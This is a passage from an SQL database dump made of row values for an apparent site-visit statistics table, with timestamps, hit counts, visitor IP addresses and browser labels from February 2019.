95,1,1,0,0,'54.36.148.207','other'),(389521,1550802725,1,1,0,0,'54.36.148.34','other'),(389522,1550802812,1,1,0,0,'54.36.150.69','other'),(389523,1550803419,1,1,0,0,'54.36.150.28','other'),(389524,1550803549,1,1,0,0,'40.77.167.9','other'),(389525,1550803603,1,1,0,0,'54.36.150.25','other'),(389526,1550803809,1,1,0,0,'54.36.148.107','other'),(389527,1550803993,1,1,0,0,'54.36.148.89','other'),(389528,1550804206,1,1,0,0,'54.36.148.205','other'),(389529,1550804491,1,1,0,0,'46.229.168.139','other'),(389530,1550804894,1,1,0,0,'40.77.167.9','other'),(389531,1550805077,1,1,0,0,'66.249.64.29','chrome'),(389532,1550805164,1,1,0,0,'54.36.150.152','other'),(389533,1550805204,1,1,0,0,'95.163.255.159','other'),(389534,1550805265,1,1,0,0,'40.77.167.106','other'),(389535,1550805379,1,1,0,0,'54.36.150.39','other'),(389536,1550805391,1,1,0,0,'54.36.148.161','other'),(389537,1550805621,1,1,0,0,'54.36.148.101','other'),(389538,1550805710,1,1,0,0,'46.229.168.145','other'),(389539,1550805986,1,1,0,0,'54.36.149.44','other'),(389540,1550806689,1,1,0,0,'54.36.149.80','other'),(389541,1550806787,1,1,0,0,'66.249.64.31','chrome'),(389542,1550806918,3,3,0,0,'216.244.66.241','other'),(389543,1550806940,1,1,0,0,'157.55.39.215','other'),(389544,1550807004,1,1,0,0,'40.77.167.9','other'),(389545,1550807645,1,1,0,0,'54.36.148.19','other'),(389546,1550807664,1,1,0,0,'54.36.148.26','other'),(389547,1550808032,1,1,0,0,'66.249.64.29','chrome'),(389548,1550808118,1,1,0,0,'54.36.148.108','other'),(389549,1550808539,1,1,0,0,'46.229.168.137','other'),(389550,1550808578,1,0,1,0,'66.249.64.30',''),(389551,1550808844,1,1,0,0,'54.36.150.59','other'),(389552,1550809014,1,1,0,0,'54.36.148.27','other'),(389553,1550809102,1,1,0,0,'54.36.148.8','other'),(389554,1550809158,1,1,0,0,'66.249.64.29','chrome'),(389555,1550809225,1,1,0,0,'66.249.64.30','chrome'),(389556,1550809226,1,1,0,0,'207.46.13.101','other'),(389557,1550809398,1,1,0,0,'54.36.148.254','other'),(389558,1550809441,1,1,0,0,'66.249.64.31','chrome'),(389559,1550809558,2,2,0,0,'216.244.66.241','other'),(389560,1550810024,1,1,0,0,'54.36.150.178','other'),(389561,1550810035,1,1,0,0,'54.36.148.255','other'),(389562,1550810250,1,1,0,0,'46.229.168.136','other'),(389563,1550810371,1,1,0,0,'54.36.150.111','other'),(389564,1550810522,1,1,0,0,'66.249.64.29','chrome'),(389565,1550810648,1,1,0,0,'54.36.148.225','other'),(389566,1550811359,1,1,0,0,'8.29.198.26','other'),(389567,1550811365,1,1,0,0,'95.163.255.186','other'),(389569,1550811501,2,2,0,0,'216.244.66.241','other'),(389570,1550812365,1,1,0,0,'66.249.64.30','chrome'),(389571,1550812531,2,2,0,0,'207.46.13.101','other'),(389572,1550812722,1,1,0,0,'8.29.198.27','other'),(389573,1550813497,1,1,0,0,'157.55.39.8','other'),(389574,1550814291,1,1,0,0,'66.249.64.29','chrome'),(389575,1550814395,1,1,0,0,'66.249.64.62','chrome'),(389576,1550814611,5,5,0,0,'216.244.66.241','other'),(389577,1550815566,1,1,0,0,'207.46.13.101','other'),(389578,1550815968,1,1,0,0,'185.220.102.7','other'),(389579,1550816019,1,1,0,0,'46.229.168.136','other'),(389580,1550816236,1,1,0,0,'46.229.168.137','other'),(389581,1550816404,1,1,0,0,'40.77.167.101','other'),(389582,1550816477,2,2,0,0,'66.249.64.29','chrome'),(389583,1550816559,1,1,0,0,'91.196.178.79','chrome'),(389584,1550816921,1,1,0,0,'66.249.75.218','chrome'),(389585,1550817250,1,1,0,0,'91.196.178.162','chrome'),(389586,1550817292,1,1,0,0,'66.249.64.62','chrome'),(389587,1550817551,1,1,0,0,'91.196.178.79','chrome'),(389588,1550817634,1,1,0,0,'40.77.167.101','other'),(389589,1550817648,2,2,0,0,'95.132.42.2','other'),(389590,1550818038,1,0,1,0,'66.249.64.30',''),(389591,1550818412,1,1,0,0,'46.229.168.138','other'),(389592,1550818961,1,1,0,0,'91.196.177.46','chrome'),(389593,1550819269,1,1,0,0,'66.249.64.58','chrome'),(389594,1550819319,1,1,0,0,'207.46.13.101','other'),(389595,1550819429,1,1,0,0,'46.229.168.139','other'),(389596,1550819480,1,1,0,0,'40.77.167.101','other'),(389597,1550820214,1,1,0,0,'46.229.168.153','other'),(389598,1550820293,1,1,0,0,'207.46.13.101','other'),(389599,1550820321,1,1,0,0,'66.249.64.60','chrome'),(389600,1550820382,1,1,0,0,'5.196.80.103','firefox'),(389601,1550820513,1,1,0,0,'66.249.64.29','chrome'),(389602,1550820964,1,1,0,0,'95.163.255.117','other'),(389603,1550821029,2,2,0,0,'5.45.207.19','other'),(389604,1550821039,1,1,0,0,'95.163.255.108','other'),(389605,1550821532,2,2,0,0,'91.196.82.13','other'),(389606,1550821724,1,1,0,0,'207.46.13.101','other'),(389607,1550822206,1,1,0,0,'8.29.198.25','other'),(389608,1550822960,1,1,0,0,'207.46.13.101','other'),(389609,1550823257,1,1,0,0,'46.229.168.140','other'),(389610,1550823262,1,1,0,0,'216.244.66.241','other'),(389611,1550823556,1,1,0,0,'8.29.198.27','other'),(389612,1550823681,1,1,0,0,'37.55.51.47','chrome'),(389613,1550823933,1,1,0,0,'46.229.168.147','other'),(389614,1550824456,1,1,0,0,'46.229.168.148','other'),(389615,1550824517,1,1,0,0,'82.145.210.99','other'),(389616,1550825491,1,1,0,0,'66.249.64.30','chrome'),(389617,1550825585,2,2,0,0,'157.55.39.75','other'),(389618,1550826670,1,1,0,0,'54.36.149.104','other'),(389619,1550826711,1,1,0,0,'54.36.150.65','other'),(389620,1550827089,1,1,0,0,'54.36.150.19','other'),(389621,1550827145,1,1,0,0,'54.36.149.54','other'),(389622,1550827425,1,1,0,0,'94.45.145.5','firefox'),(389623,1550827501,1,1,0,0,'82.145.210.249','other'),(389624,1550827521,1,1,0,0,'66.249.64.30','chrome'),(389625,1550827620,1,1,0,0,'91.124.182.170','firefox'),(389626,1550827748,1,1,0,0,'46.229.168.137','other'),(389627,1550827830,1,1,0,0,'91.196.178.94','chrome'),(389628,1550827905,1,1,0,0,'91.196.178.169','firefox'),(389629,1550827936,1,1,0,0,'157.55.39.85','other'),(389630,1550827966,2,2,0,0,'216.244.66.241','other'),(389631,1550828033,1,1,0,0,'54.36.150.40','other'),(389632,1550828173,1,1,0,0,'54.36.150.71','other'),(389633,1550829005,1,1,0,0,'54.36.148.189','other'),(389634,1550829040,2,2,0,0,'91.124.182.170','firefox'),(389635,1550829204,1,1,0,0,'91.196.178.161','chrome'),(389636,1550829331,2,2,0,0,'91.196.178.94','chrome'),(389637,1550829534,1,1,0,0,'46.229.168.145','other'),(389638,1550829555,2,2,0,0,'91.196.178.77','chrome'),(389639,1550829595,1,1,0,0,'46.229.168.129','other'),(389640,1550829674,2,2,0,0,'91.224.157.254','chrome'),(389641,1550829863,1,1,0,0,'37.204.4.249','msie'),(389642,1550829911,1,1,0,0,'78.111.187.95','chrome'),(389643,1550829944,1,1,0,0,'91.124.182.170','firefox'),(389644,1550830107,1,1,0,0,'217.76.195.174','chrome'),(389645,1550830140,1,1,0,0,'54.36.148.249','other'),(389646,1550830216,1,1,0,0,'91.196.178.161','chrome'),(389647,1550830256,1,1,0,0,'54.36.148.251','other'),(389648,1550830262,1,1,0,0,'91.196.178.94','chrome'),(389649,1550830310,1,1,0,0,'31.13.127.14','other'),(389650,1550830313,1,1,0,0,'66.220.149.30','other'),(389651,1550830320,1,1,0,0,'54.36.148.120','other'),(389652,1550830385,1,1,0,0,'95.132.41.172','chrome'),(389653,1550830395,1,1,0,0,'46.229.168.153','other'),(389654,1550830523,1,1,0,0,'54.36.149.82','other'),(389655,1550830739,1,1,0,0,'54.36.150.22','other'),(389656,1550830832,1,1,0,0,'54.36.148.14','other'),(389657,1550830879,1,1,0,0,'54.36.148.138','other'),(389658,1550830882,1,1,0,0,'54.36.150.146','other'),(389659,1550831219,1,1,0,0,'54.36.150.142','other'),(389660,1550831510,1,1,0,0,'46.229.168.153','other'),(389661,1550832126,1,1,0,0,'46.229.168.152','other'),(389662,1550832294,1,1,0,0,'94.178.146.115','chrome'),(389663,1550832472,1,1,0,0,'54.36.148.108','other'),(389664,1550832685,1,1,0,0,'91.196.177.46','firefox'),(389665,1550832888,1,1,0,0,'54.36.150.84','other'),(389666,1550832917,1,1,0,0,'54.36.148.242','other'),(389667,1550833047,1,1,0,0,'66.249.64.31','chrome'),(389668,1550833054,1,1,0,0,'8.29.198.25','other'),(389669,1550833382,1,1,0,0,'91.124.182.170','firefox'),(389670,1550833574,1,1,0,0,'54.36.150.132','other'),(389671,1550833656,1,1,0,0,'91.196.177.46','firefox'),(389672,1550834024,1,1,0,0,'54.36.150.57','other'),(389673,1550834066,1,1,0,0,'54.36.148.95','other'),(389674,1550834397,1,1,0,0,'8.29.198.26','other'),(389675,1550834810,1,1,0,0,'66.249.64.31','chrome'),(389676,1550834943,1,1,0,0,'66.249.64.29','chrome'),(389677,1550834995,1,1,0,0,'66.249.64.58','chrome'),(389678,1550835533,1,1,0,0,'54.36.148.245','other'),(389679,1550835619,1,1,0,0,'46.229.168.138','other'),(389680,1550835687,1,1,0,0,'46.229.168.152','other'),(389681,1550835943,2,2,0,0,'66.249.64.30','chrome'),(389682,1550835957,2,2,0,0,'157.55.39.73','other'),(389683,1550836302,1,1,0,0,'46.229.168.134','other'),(389684,1550836544,1,1,0,0,'66.249.64.29','chrome'),(389685,1550836624,1,1,0,0,'54.36.148.125','other'),(389686,1550836867,1,1,0,0,'81.163.126.112','chrome'),(389687,1550836978,1,1,0,0,'46.229.168.149','other'),(389688,1550837074,1,1,0,0,'54.36.149.91','other'),(389689,1550837181,1,1,0,0,'157.55.39.73','other'),(389690,1550837225,1,1,0,0,'66.249.64.31','chrome'),(389691,1550837417,1,1,0,0,'54.36.149.24','other'),(389692,1550838067,1,1,0,0,'46.133.19.76','chrome'),(389693,1550838190,1,1,0,0,'54.36.149.0','other'),(389694,1550838232,1,1,0,0,'54.36.148.172','other'),(389695,1550838285,4,4,0,0,'66.249.64.29','chrome'),(389696,1550838517,1,1,0,0,'54.36.150.40','other'),(389697,1550838528,1,1,0,0,'216.244.66.241','other'),(389698,1550838544,2,2,0,0,'66.249.64.60','chrome'),(389699,1550838750,1,1,0,0,'46.229.168.134','other'),(389700,1550839150,1,1,0,0,'46.229.168.135','other'),(389701,1550839258,1,1,0,0,'157.55.39.73','other'),(389702,1550839904,1,1,0,0,'54.36.149.7','other'),(389703,1550839991,1,1,0,0,'54.36.148.123','other'),(389704,1550839992,1,1,0,0,'54.36.150.61','other'),(389705,1550840039,1,1,0,0,'157.55.39.4','other'),(389706,1550840195,2,2,0,0,'66.249.64.58','chrome'),(389707,1550840205,1,1,0,0,'54.36.150.179','other'),(389708,1550840263,1,1,0,0,'51.255.65.46','other'),(389709,1550840329,1,1,0,0,'46.164.159.236','chrome'),(389710,1550840365,1,1,0,0,'157.55.39.143','other'),(389711,1550840367,1,1,0,0,'66.249.64.30','chrome'),(389712,1550840444,1,1,0,0,'91.196.177.46','firefox'),(389713,1550840504,1,1,0,0,'54.36.148.131','other'),(389714,1550840543,1,1,0,0,'66.249.64.29','chrome'),(389716,1550840683,1,1,0,0,'95.132.45.102','firefox'),(389717,1550840788,1,1,0,0,'91.124.182.170','firefox'),(389718,1550840879,1,1,0,0,'54.36.150.38','other'),(389719,1550840909,1,1,0,0,'54.36.149.0','other'),(389720,1550840948,1,1,0,0,'91.196.178.169','chrome'),(389721,1550840986,1,1,0,0,'54.36.148.69','other'),(389722,1550841050,1,1,0,0,'180.76.15.14','other'),(389723,1550841159,1,1,0,0,'54.36.150.120','other'),(389724,1550841371,7,7,0,0,'216.244.66.241','other'),(389725,1550841841,1,1,0,0,'13.66.139.0','other'),(389726,1550841959,1,1,0,0,'66.249.64.29','chrome'),(389727,1550842010,1,1,0,0,'54.36.150.100','other'),(389728,1550842100,2,2,0,0,'66.249.64.58','chrome'),(389729,1550842181,1,1,0,0,'54.36.148.25','other'),(389730,1550842257,1,1,0,0,'188.239.229.90','chrome'),(389731,1550842387,1,1,0,0,'54.36.150.126','other'),(389732,1550842721,1,1,0,0,'54.36.148.253','other'),(389733,1550842755,1,1,0,0,'54.36.148.231','other'),(389734,1550843126,2,2,0,0,'54.36.149.62','other'),(389735,1550843279,1,1,0,0,'54.36.148.189','other'),(389736,1550843303,1,1,0,0,'54.36.148.166','other'),(389737,1550843418,1,1,0,0,'157.55.39.199','other'),(389738,1550843514,2,2,0,0,'66.249.64.30','chrome'),(389739,1550843524,1,1,0,0,'54.36.149.5','other'),(389740,1550843561,1,1,0,0,'54.36.148.29','other'),(389741,1550843663,1,1,0,0,'54.36.148.228','other'),(389742,1550843810,2,2,0,0,'66.249.64.31','chrome'),(389743,1550843899,1,1,0,0,'8.29.198.27','other'),(389744,1550844040,1,1,0,0,'157.55.39.73','other'),(389745,1550844317,1,1,0,0,'54.36.150.159','other'),(389746,1550844637,1,1,0,0,'216.244.66.241','other'),(389747,1550845055,1,1,0,0,'130.180.218.45','chrome'),(389748,1550845235,1,1,0,0,'8.29.198.26','other'),(389749,1550845459,1,1,0,0,'54.36.148.54','other'),(389750,1550845509,1,1,0,0,'66.249.64.29','chrome'),(389751,1550845737,1,1,0,0,'54.36.150.74','other'),(389752,1550845970,1,1,0,0,'54.36.148.48','other'),(389753,1550846041,1,1,0,0,'37.73.197.2','chrome'),(389754,1550846198,1,1,0,0,'54.36.150.188','other'),(389755,1550846293,1,1,0,0,'66.249.64.58','chrome'),(389756,1550846306,1,1,0,0,'66.249.64.31','chrome'),(389757,1550846492,2,2,0,0,'31.43.31.117','chrome'),(389758,1550846653,1,1,0,0,'216.244.66.241','other'),(389759,1550846856,1,1,0,0,'91.196.177.15','chrome'),(389760,1550846973,1,1,0,0,'157.55.39.73','other'),(389761,1550846976,1,1,0,0,'66.249.64.62','chrome'),(389762,1550847240,1,1,0,0,'54.36.148.53','other'),(389763,1550847353,1,1,0,0,'54.36.148.110','other'),(389764,1550847723,2,2,0,0,'66.249.64.30','chrome'),(389765,1550848476,1,1,0,0,'54.36.150.128','other'),(389766,1550848915,1,1,0,0,'54.36.150.117','other'),(389767,1550848988,1,1,0,0,'157.55.39.73','other'),(389768,1550849087,1,1,0,0,'46.229.168.132','other'),(389769,1550849264,1,1,0,0,'54.36.150.74','other'),(389770,1550849604,2,2,0,0,'66.249.64.29','chrome'),(389771,1550849720,1,1,0,0,'66.249.64.60','chrome'),(389772,1550850440,1,1,0,0,'54.36.150.48','other'),(389773,1550850958,1,1,0,0,'157.55.39.199','other'),(389774,1550851288,1,1,0,0,'54.36.150.184','other'),(389775,1550851376,1,1,0,0,'54.36.148.59','other'),(389776,1550851397,1,1,0,0,'5.188.210.53','chrome'),(389777,1550851871,1,1,0,0,'46.229.168.137','other'),(389778,1550851933,1,1,0,0,'13.66.139.0','other'),(389779,1550852246,1,1,0,0,'216.244.66.241','other'),(389780,1550852616,1,1,0,0,'54.36.150.89','other'),(389781,1550852799,1,1,0,0,'54.36.149.24','other'),(389782,1550853019,1,1,0,0,'46.229.168.149','other'),(389783,1550853129,2,2,0,0,'91.196.178.161','chrome'),(389784,1550853160,1,1,0,0,'46.211.96.14','chrome'),(389785,1550853187,1,1,0,0,'66.249.64.60','chrome'),(389786,1550853378,1,1,0,0,'54.36.150.133','other'),(389787,1550853536,1,1,0,0,'54.36.149.28','other'),(389788,1550853733,1,1,0,0,'54.36.148.7','other'),(389789,1550854199,1,1,0,0,'54.36.148.58','other'),(389790,1550854746,1,1,0,0,'8.29.198.27','other'),(389791,1550854821,1,1,0,0,'54.36.148.141','other'),(389792,1550854853,1,1,0,0,'207.46.13.52','other'),(389793,1550854885,1,1,0,0,'216.244.66.241','other'),(389794,1550855256,1,1,0,0,'54.36.149.102','other'),(389795,1550855336,1,1,0,0,'54.36.148.113','other'),(389796,1550855426,1,1,0,0,'54.36.148.242','other'),(389797,1550855723,1,1,0,0,'46.229.168.151','other'),(389798,1550855817,1,1,0,0,'54.36.148.140','other'),(389799,1550855980,1,1,0,0,'54.36.150.117','other'),(389800,1550856063,1,1,0,0,'8.29.198.26','other'),(389801,1550856204,1,1,0,0,'54.36.150.178','other'),(389802,1550856264,1,1,0,0,'180.76.15.16','other'),(389803,1550856282,1,1,0,0,'66.249.64.29','chrome'),(389804,1550856533,1,1,0,0,'54.36.149.58','other'),(389805,1550856697,1,1,0,0,'46.229.168.136','other'),(389806,1550856755,1,1,0,0,'54.36.148.109','other'),(389807,1550857194,1,1,0,0,'66.249.64.58','chrome'),(389808,1550857291,1,1,0,0,'157.55.39.11','other'),(389809,1550857491,2,2,0,0,'216.244.66.241','other'),(389810,1550857586,1,1,0,0,'54.36.150.69','other'),(389811,1550857607,1,1,0,0,'54.36.148.166','other'),(389812,1550857847,1,1,0,0,'54.36.150.170','other'),(389813,1550858388,1,1,0,0,'141.8.142.103','other'),(389814,1550858488,1,1,0,0,'66.249.64.58','chrome'),(389815,1550858564,16,16,0,0,'174.136.12.57','other'),(389816,1550858656,1,1,0,0,'54.36.148.188','other'),(389817,1550858686,1,1,0,0,'66.249.64.29','chrome'),(389818,1550858711,1,1,0,0,'54.36.148.199','other'),(389819,1550859124,1,1,0,0,'54.36.149.100','other'),(389820,1550859172,1,1,0,0,'46.229.168.149','other'),(389821,1550859190,1,1,0,0,'66.249.64.62','chrome'),(389822,1550859204,1,1,0,0,'66.249.64.31','chrome'),(389823,1550859346,1,1,0,0,'54.36.148.206','other'),(389824,1550859375,1,1,0,0,'207.46.13.166','other'),(389825,1550859589,1,1,0,0,'54.36.148.106','other'),(389826,1550860068,1,1,0,0,'46.229.168.144','other'),(389827,1550860107,1,1,0,0,'54.36.150.92','other'),(389828,1550860118,1,1,0,0,'54.36.149.58','other'),(389829,1550860181,5,5,0,0,'216.244.66.241','other'),(389830,1550860201,1,1,0,0,'54.36.148.181','other'),(389831,1550860676,1,1,0,0,'54.36.150.115','other'),(389832,1550860968,1,1,0,0,'54.36.150.120','other'),(389833,1550860998,1,1,0,0,'95.134.220.113','other'),(389834,1550861089,1,1,0,0,'54.36.148.69','other'),(389835,1550861173,3,3,0,0,'66.249.64.30','chrome'),(389836,1550861292,1,1,0,0,'54.36.148.73','other'),(389837,1550861331,1,1,0,0,'54.36.150.60','other'),(389838,1550861380,1,1,0,0,'54.36.148.103','other'),(389839,1550861563,1,1,0,0,'54.36.150.90','other'),(389840,1550862012,1,1,0,0,'54.36.150.118','other'),(389841,1550862047,1,1,0,0,'46.229.168.148','other'),(389842,1550862626,1,1,0,0,'46.229.168.143','other'),(389843,1550862628,1,1,0,0,'54.36.150.76','other'),(389844,1550862805,1,1,0,0,'185.190.151.129','chrome'),(389845,1550863128,1,1,0,0,'54.36.148.89','other'),(389846,1550863141,1,1,0,0,'216.244.66.241','other'),(389847,1550863458,1,1,0,0,'157.55.39.129','other'),(389848,1550863466,1,1,0,0,'54.36.148.117','other'),(389849,1550863477,1,1,0,0,'54.36.150.91','other'),(389850,1550863529,1,1,0,0,'91.196.178.19','chrome'),(389851,1550863741,1,1,0,0,'54.36.150.81','other'),(389852,1550863992,1,1,0,0,'66.249.64.31','chrome'),(389853,1550864320,1,1,0,0,'95.132.19.59','chrome'),(389854,1550864351,1,1,0,0,'54.36.148.226','other'),(389855,1550864466,1,1,0,0,'46.229.168.148','other'),(389856,1550864483,1,1,0,0,'54.36.148.198','other'),(389857,1550864504,1,1,0,0,'66.249.64.29','chrome'),(389858,1550864568,1,1,0,0,'180.76.15.31','other'),(389859,1550864924,2,2,0,0,'91.196.178.87','chrome'),(389860,1550865160,1,1,0,0,'178.154.244.11','other'),(389861,1550865272,1,1,0,0,'54.36.149.13','other'),(389862,1550865369,2,2,0,0,'157.55.39.255','other'),(389863,1550865543,1,1,0,0,'46.229.168.130','other'),(389864,1550865584,1,1,0,0,'8.29.198.26','other'),(389865,1550865755,1,1,0,0,'46.229.168.148','other'),(389866,1550866041,1,1,0,0,'54.36.148.78','other'),(389867,1550866042,1,1,0,0,'157.55.39.171','other'),(389868,1550866253,1,1,0,0,'216.244.66.241','other'),(389869,1550866410,1,1,0,0,'66.249.64.29','chrome'),(389870,1550866571,1,1,0,0,'54.36.149.58','other'),(389871,1550866897,1,1,0,0,'8.29.198.25','other'),(389872,1550867415,2,2,0,0,'46.229.168.130','other'),(389873,1550867448,1,1,0,0,'46.229.168.152','other'),(389874,1550867893,1,1,0,0,'62.216.43.138','chrome'),(389875,1550867939,1,1,0,0,'54.36.149.100','other'),(389876,1550868226,1,1,0,0,'91.196.178.43','chrome'),(389877,1550868264,1,1,0,0,'54.36.148.243','other'),(389878,1550868409,1,1,0,0,'54.36.150.160','other'),(389879,1550868417,4,4,0,0,'216.244.66.241','other'),(389880,1550868586,1,1,0,0,'54.36.150.51','other'),(389881,1550869129,1,1,0,0,'54.36.148.20','other'),(389882,1550869186,1,1,0,0,'91.121.178.215','msie'),(389883,1550869362,1,1,0,0,'54.36.150.18','other'),(389884,1550869672,1,1,0,0,'54.36.148.169','other'),(389885,1550870057,1,1,0,0,'46.229.168.146','other'),(389886,1550870540,1,1,0,0,'54.36.150.52','other'),(389887,1550870646,1,1,0,0,'5.45.207.19','other'),(389888,1550870650,1,1,0,0,'178.154.244.11','other'),(389889,1550870681,1,1,0,0,'54.36.150.174','other'),(389890,1550870817,1,1,0,0,'54.36.150.44','other'),(389891,1550871156,4,4,0,0,'216.244.66.241','other'),(389892,1550871514,1,1,0,0,'54.36.150.39','other'),(389893,1550871643,1,1,0,0,'66.249.64.29','chrome'),(389894,1550871895,1,1,0,0,'54.36.149.30','other'),(389895,1550871957,1,1,0,0,'18.217.239.46','chrome'),(389896,1550872344,1,1,0,0,'54.36.149.2','other'),(389897,1550872350,1,1,0,0,'66.249.64.31','chrome'),(389898,1550872540,1,1,0,0,'54.36.148.251','other'),(389899,1550872586,1,1,0,0,'66.249.64.30','chrome'),(389900,1550872663,1,1,0,0,'54.36.148.244','other'),(389901,1550872865,1,1,0,0,'54.36.150.9','other'),(389902,1550872884,1,1,0,0,'54.36.150.36','other'),(389903,1550873017,1,1,0,0,'54.36.148.208','other'),(389904,1550873055,1,1,0,0,'46.229.168.135','other'),(389905,1550873178,1,1,0,0,'66.249.64.60','chrome'),(389906,1550873297,1,1,0,0,'54.36.149.10','other'),(389907,1550873735,3,3,0,0,'216.244.66.241','other'),(389908,1550873908,1,1,0,0,'54.36.148.24','other'),(389909,1550873961,1,1,0,0,'40.77.167.165','other'),(389910,1550873976,1,1,0,0,'54.36.149.88','other'),(389911,1550874129,1,1,0,0,'54.36.150.151','other'),(389912,1550874282,1,1,0,0,'66.249.64.31','chrome'),(389913,1550874344,1,1,0,0,'54.36.150.111','other'),(389914,1550875142,1,1,0,0,'66.249.64.58','chrome'),(389915,1550875156,1,1,0,0,'66.249.64.29','chrome'),(389916,1550875468,1,1,0,0,'54.36.150.4','other'),(389917,1550875946,1,1,0,0,'66.249.64.31','chrome'),(389918,1550876419,1,1,0,0,'8.29.198.27','other'),(389919,1550876538,1,1,0,0,'216.244.66.241','other'),(389920,1550876672,1,1,0,0,'54.36.150.160','other'),(389921,1550877011,1,1,0,0,'40.77.167.149','other'),(389922,1550877060,1,1,0,0,'40.77.167.165','other'),(389923,1550877134,1,1,0,0,'40.77.167.44','other'),(389924,1550877152,1,1,0,0,'54.36.150.22','other'),(389925,1550877315,1,1,0,0,'54.36.148.95','other'),(389926,1550877592,1,1,0,0,'54.36.150.183','other'),(389927,1550877735,1,1,0,0,'8.29.198.25','other'),(389928,1550878059,1,1,0,0,'54.36.148.228','other'),(389929,1550878614,1,1,0,0,'157.55.39.171','other'),(389930,1550878787,1,1,0,0,'54.36.149.37','other'),(389931,1550878801,1,1,0,0,'40.77.167.165','other'),(389932,1550878905,1,1,0,0,'66.249.64.31','chrome'),(389933,1550878995,1,1,0,0,'66.249.64.30','chrome'),(389934,1550879078,1,1,0,0,'46.229.168.137','other'),(389935,1550879303,8,8,0,0,'144.76.120.197','other'),(389936,1550879344,1,1,0,0,'216.244.66.241','other'),(389937,1550879403,1,1,0,0,'40.77.167.149','other'),(389938,1550879477,1,1,0,0,'54.36.149.7','other'),(389939,1550879652,1,1,0,0,'66.249.64.29','chrome'),(389940,1550880053,1,1,0,0,'54.36.148.36','other'),(389941,1550880271,2,2,0,0,'66.249.64.60','chrome'),(389942,1550880406,1,1,0,0,'54.36.148.64','other'),(389943,1550880548,1,1,0,0,'54.36.149.14','other'),(389944,1550880636,1,1,0,0,'157.55.39.171','other'),(389945,1550880825,1,1,0,0,'66.249.64.62','chrome'),(389946,1550881024,1,1,0,0,'66.249.64.30','chrome'),(389947,1550881175,1,1,0,0,'54.36.148.141','other'),(389948,1550881470,1,1,0,0,'66.249.64.29','chrome'),(389949,1550881655,3,3,0,0,'216.244.66.241','other'),(389950,1550881711,1,1,0,0,'54.36.148.89','other'),(389951,1550881821,1,1,0,0,'54.36.148.151','other'),(389952,1550881942,1,1,0,0,'37.9.113.148','other'),(389953,1550882309,1,1,0,0,'54.36.150.97','other'),(389954,1550882344,1,1,0,0,'178.154.244.65','other'),(389955,1550882480,1,1,0,0,'54.36.148.55','other'),(389956,1550882625,1,1,0,0,'46.229.168.151','other'),(389957,1550882748,1,1,0,0,'54.36.150.171','other'),(389958,1550882855,1,1,0,0,'40.77.167.152','other'),(389959,1550882906,1,1,0,0,'54.36.148.98','other'),(389960,1550883013,1,1,0,0,'54.36.149.2','other'),(389961,1550883254,1,1,0,0,'54.36.148.235','other'),(389962,1550883330,1,1,0,0,'54.36.150.73','other'),(389963,1550883505,1,1,0,0,'18.234.64.80','chrome'),(389964,1550883529,1,1,0,0,'54.36.148.204','other'),(389965,1550883744,1,1,0,0,'54.36.150.78','other'),(389966,1550884218,1,1,0,0,'54.36.148.113','other'),(389967,1550884263,1,1,0,0,'54.36.150.170','other'),(389968,1550884661,1,1,0,0,'54.36.148.129','other'),(389969,1550884714,1,1,0,0,'46.229.168.141','other'),(389970,1550884752,2,2,0,0,'216.244.66.241','other'),(389971,1550884778,1,1,0,0,'54.36.148.19','other'),(389972,1550884972,1,1,0,0,'54.36.150.88','other'),(389973,1550884991,1,1,0,0,'5.45.207.19','other'),(389974,1550885657,1,1,0,0,'66.249.64.29','chrome'),(389975,1550886021,1,1,0,0,'54.36.150.49','other'),(389976,1550886174,1,1,0,0,'54.36.150.186','other'),(389977,1550886249,1,1,0,0,'54.36.150.108','other'),(389978,1550886429,1,1,0,0,'54.36.150.28','other'),(389979,1550886447,1,1,0,0,'54.36.148.14','other'),(389980,1550886527,1,1,0,0,'54.36.148.228','other'),(389981,1550886769,2,2,0,0,'144.76.56.124','other'),(389982,1550886802,1,1,0,0,'54.36.148.49','other'),(389983,1550886824,1,1,0,0,'54.36.150.174','other'),(389984,1550887065,1,1,0,0,'46.229.168.148','other'),(389985,1550887256,1,1,0,0,'8.29.198.25','other'),(389986,1550887303,1,1,0,0,'66.249.64.29','chrome'),(389987,1550887323,2,2,0,0,'216.244.66.241','other'),(389988,1550887679,1,1,0,0,'46.229.168.139','other'),(389989,1550887715,1,1,0,0,'54.36.148.28','other'),(389990,1550887952,1,1,0,0,'66.249.64.30','chrome'),(389991,1550888272,1,1,0,0,'54.36.150.15','other'),(389992,1550888570,1,1,0,0,'8.29.198.26','other'),(389993,1550888768,1,1,0,0,'54.36.150.77','other'),(389994,1550889031,1,1,0,0,'54.36.150.183','other'),(389995,1550889089,1,1,0,0,'46.229.168.139','other'),(389996,1550889178,1,1,0,0,'66.249.64.29','chrome'),(389997,1550889489,2,2,0,0,'66.249.64.30','chrome'),(389998,1550889865,1,1,0,0,'54.36.150.17','other'),(389999,1550889870,3,3,0,0,'66.249.64.31','chrome'),(390000,1550889976,1,1,0,0,'46.229.168.146','other'),(390001,1550890026,1,1,0,0,'157.55.39.156','other'),(390002,1550890285,1,1,0,0,'207.46.13.205','other'),(390003,1550890401,2,2,0,0,'216.244.66.241','other'),(390004,1550890470,1,1,0,0,'54.36.150.120','other'),(390005,1550890933,1,1,0,0,'54.36.150.89','other'),(390006,1550891131,1,1,0,0,'66.249.64.58','chrome'),(390007,1550891318,1,1,0,0,'207.46.13.205','other'),(390008,1550891508,1,1,0,0,'46.229.168.135','other'),(390009,1550891552,2,2,0,0,'52.39.155.19','chrome'),(390010,1550891845,1,1,0,0,'66.249.64.30','chrome'),(390011,1550891912,1,1,0,0,'54.36.150.35','other'),(390012,1550891993,1,1,0,0,'54.36.148.88','other'),(390013,1550892040,1,1,0,0,'54.36.150.60','other'),(390014,1550892108,1,1,0,0,'54.36.150.96','other'),(390015,1550892609,1,1,0,0,'66.249.64.29','chrome'),(390016,1550892642,2,2,0,0,'216.244.66.241','other'),(390017,1550892690,1,1,0,0,'66.249.64.60','chrome'),(390018,1550892879,1,1,0,0,'54.36.149.10','other'),(390019,1550892885,1,1,0,0,'66.249.64.30','chrome'),(390020,1550892903,1,1,0,0,'46.229.168.152','other'),(390021,1550893147,1,1,0,0,'46.229.168.149','other'),(390022,1550893369,1,1,0,0,'207.46.13.92','other'),(390023,1550893541,1,1,0,0,'66.249.64.31','chrome'),(390024,1550893659,1,1,0,0,'54.36.148.32','other'),(390025,1550894043,1,1,0,0,'66.249.64.62','chrome'),(390026,1550894214,1,1,0,0,'54.36.148.48','other'),(390027,1550894298,1,1,0,0,'54.36.150.152','other'),(390028,1550894318,1,1,0,0,'54.36.150.8','other'),(390029,1550894756,1,1,0,0,'66.249.64.29','chrome'),(390030,1550895016,1,1,0,